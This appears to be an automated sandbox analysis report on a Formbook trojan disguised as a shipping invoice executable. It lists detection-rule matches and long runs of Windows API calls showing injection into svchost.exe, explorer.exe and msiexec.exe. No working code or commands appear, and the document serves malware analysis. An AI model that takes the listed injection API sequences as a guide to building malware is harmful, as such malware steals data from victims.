Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Invoice Packing list For Sea Shipment.exe PID: 7692, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 7764, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msiexec.exe PID: 7804, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Invoice Packing list For Sea Shipment.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A320 NtCreateFile,	2_2_0041A320
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A3D0 NtReadFile,	2_2_0041A3D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A450 NtClose,	2_2_0041A450
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A500 NtAllocateVirtualMemory,	2_2_0041A500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A31D NtCreateFile,	2_2_0041A31D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A44A NtClose,	2_2_0041A44A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B60 NtClose,LdrInitializeThunk,	2_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AD0 NtReadFile,LdrInitializeThunk,	2_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F90 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FB0 NtResumeThread,LdrInitializeThunk,	2_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FE0 NtCreateFile,LdrInitializeThunk,	2_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F30 NtCreateSection,LdrInitializeThunk,	2_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E80 NtReadVirtualMemory,LdrInitializeThunk,	2_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DD0 NtDelayExecution,LdrInitializeThunk,	2_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D10 NtMapViewOfSection,LdrInitializeThunk,	2_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D30 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CA0 NtQueryInformationToken,LdrInitializeThunk,	2_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874340 NtSetContextThread,	2_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874650 NtSuspendThread,	2_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B80 NtQueryInformationFile,	2_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BA0 NtEnumerateValueKey,	2_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BE0 NtQueryValueKey,	2_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AB0 NtWaitForSingleObject,	2_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AF0 NtWriteFile,	2_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FA0 NtQuerySection,	2_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F60 NtCreateProcessEx,	2_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EE0 NtQueueApcThread,	2_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E30 NtWriteVirtualMemory,	2_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DB0 NtEnumerateKey,	2_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D00 NtSetInformationFile,	2_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CC0 NtQueryVirtualMemory,	2_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CF0 NtOpenProcess,	2_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C00 NtQueryInformationProcess,	2_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C60 NtCreateKey,	2_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C70 NtFreeVirtualMemory,	2_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873090 NtSetValueKey,	2_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873010 NtOpenDirectoryObject,	2_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038735C0 NtCreateMutant,	2_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038739B0 NtGetContextThread,	2_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D10 NtOpenProcessToken,	2_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D70 NtOpenThread,	2_2_03873D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CCA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	2_2_03CCA036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CCA042 NtQueryInformationProcess,	2_2_03CCA042
Source: C:\Windows\explorer.exe	Code function: 3_2_10D5FE12 NtProtectVirtualMemory,	3_2_10D5FE12
Source: C:\Windows\explorer.exe	Code function: 3_2_10D5E232 NtCreateFile,	3_2_10D5E232
Source: C:\Windows\explorer.exe	Code function: 3_2_10D5FE0A NtProtectVirtualMemory,	3_2_10D5FE0A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_004463E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW,	4_2_004463E3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_04BF2CA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_04BF2C70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2C60 NtCreateKey,LdrInitializeThunk,	4_2_04BF2C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_04BF2DF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_04BF2DD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_04BF2D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_04BF2EA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2FE0 NtCreateFile,LdrInitializeThunk,	4_2_04BF2FE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2F30 NtCreateSection,LdrInitializeThunk,	4_2_04BF2F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2AD0 NtReadFile,LdrInitializeThunk,	4_2_04BF2AD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2B60 NtClose,LdrInitializeThunk,	4_2_04BF2B60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF35C0 NtCreateMutant,LdrInitializeThunk,	4_2_04BF35C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF4650 NtSuspendThread,	4_2_04BF4650
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF4340 NtSetContextThread,	4_2_04BF4340
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2CF0 NtOpenProcess,	4_2_04BF2CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2CC0 NtQueryVirtualMemory,	4_2_04BF2CC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2C00 NtQueryInformationProcess,	4_2_04BF2C00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2DB0 NtEnumerateKey,	4_2_04BF2DB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2D30 NtUnmapViewOfSection,	4_2_04BF2D30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2D00 NtSetInformationFile,	4_2_04BF2D00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2E80 NtReadVirtualMemory,	4_2_04BF2E80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2EE0 NtQueueApcThread,	4_2_04BF2EE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2E30 NtWriteVirtualMemory,	4_2_04BF2E30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2FB0 NtResumeThread,	4_2_04BF2FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2FA0 NtQuerySection,	4_2_04BF2FA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2F90 NtProtectVirtualMemory,	4_2_04BF2F90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2F60 NtCreateProcessEx,	4_2_04BF2F60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2AB0 NtWaitForSingleObject,	4_2_04BF2AB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2AF0 NtWriteFile,	4_2_04BF2AF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2BA0 NtEnumerateValueKey,	4_2_04BF2BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2B80 NtQueryInformationFile,	4_2_04BF2B80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2BF0 NtAllocateVirtualMemory,	4_2_04BF2BF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF2BE0 NtQueryValueKey,	4_2_04BF2BE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF3090 NtSetValueKey,	4_2_04BF3090
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF3010 NtOpenDirectoryObject,	4_2_04BF3010
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF3D10 NtOpenProcessToken,	4_2_04BF3D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF3D70 NtOpenThread,	4_2_04BF3D70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF39B0 NtGetContextThread,	4_2_04BF39B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CDA3D0 NtReadFile,	4_2_02CDA3D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CDA320 NtCreateFile,	4_2_02CDA320
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CDA450 NtClose,	4_2_02CDA450
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CDA31D NtCreateFile,	4_2_02CDA31D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CDA44A NtClose,	4_2_02CDA44A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A2A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	4_2_04A2A036
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A29BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	4_2_04A29BAF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A2A042 NtQueryInformationProcess,	4_2_04A2A042
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A29BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_04A29BB2

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00434D50

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_004461ED

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

0_2_004364AA

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00412038	0_2_00412038
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00427161	0_2_00427161
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0047E1FA	0_2_0047E1FA
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_004212BE	0_2_004212BE
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00443390	0_2_00443390
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00443391	0_2_00443391
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0041A46B	0_2_0041A46B
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0041240C	0_2_0041240C
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00446566	0_2_00446566
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_004045E0	0_2_004045E0
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0041D750	0_2_0041D750
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_004037E0	0_2_004037E0
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00427859	0_2_00427859
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00412818	0_2_00412818
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0040F890	0_2_0040F890
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0042397B	0_2_0042397B
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00409A40	0_2_00409A40
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00411B63	0_2_00411B63
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0047CBF0	0_2_0047CBF0
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0044EBBC	0_2_0044EBBC
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00412C38	0_2_00412C38
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0044ED9A	0_2_0044ED9A
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00423EBF	0_2_00423EBF
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00424F70	0_2_00424F70
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0041AF0D	0_2_0041AF0D
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_03E38628	0_2_03E38628
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D89D	2_2_0041D89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C3F2	2_2_0041C3F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E4C	2_2_00409E4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E50	2_2_00409E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E79D	2_2_0041E79D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039003E6	2_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C02C0	2_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F41A2	2_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039001AA	2_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F81CC	2_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830100	2_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864750	2_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C6E0	2_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03900591	2_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EE4F6	2_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4420	2_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F2446	2_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F6BD7	2_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390A9A6	2_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038268B8	2_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E8F0	2_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384A840	2_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03842840	2_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BEFA0	2_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832FC8	2_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384CFE0	2_2_0384CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03882F28	2_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860F30	2_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E2F30	2_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4F40	2_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852E90	2_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FCE93	2_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEEDB	2_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEE26	2_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840E59	2_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03858DBF	2_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383ADE0	2_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384AD00	2_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DCD1F	2_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0CB5	2_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830CF2	2_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840C00	2_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388739A	2_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F132D	2_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382D34C	2_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038452A0	2_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B2C0	2_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E12ED	2_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384B1B0	2_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387516C	2_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382F172	2_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390B16B	2_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EF0CC	2_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038470C0	2_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F70E9	2_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF0E0	2_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF7B0	2_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F16CC	2_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885630	2_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DD5B0	2_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039095C3	2_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7571	2_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF43F	2_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03831460	2_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FB80	2_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B5BF0	2_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387DBF9	2_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFB76	2_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DDAAC	2_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885AA0	2_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E1AA3	2_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EDAC6	2_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFA49	2_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7A46	2_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B3A6C	2_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D5910	2_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849950	2_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B950	2_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038438E0	2_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AD800	2_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03841F92	2_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFFB1	2_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD2	2_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD5	2_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFF09	2_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849EB0	2_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FDC0	2_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03843D40	2_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F1D5A	2_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7D73	2_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFCF2	2_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B9C32	2_2_038B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CCA036	2_2_03CCA036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CCB232	2_2_03CCB232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC1082	2_2_03CC1082
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CCE5CD	2_2_03CCE5CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC5B30	2_2_03CC5B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC5B32	2_2_03CC5B32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC8912	2_2_03CC8912
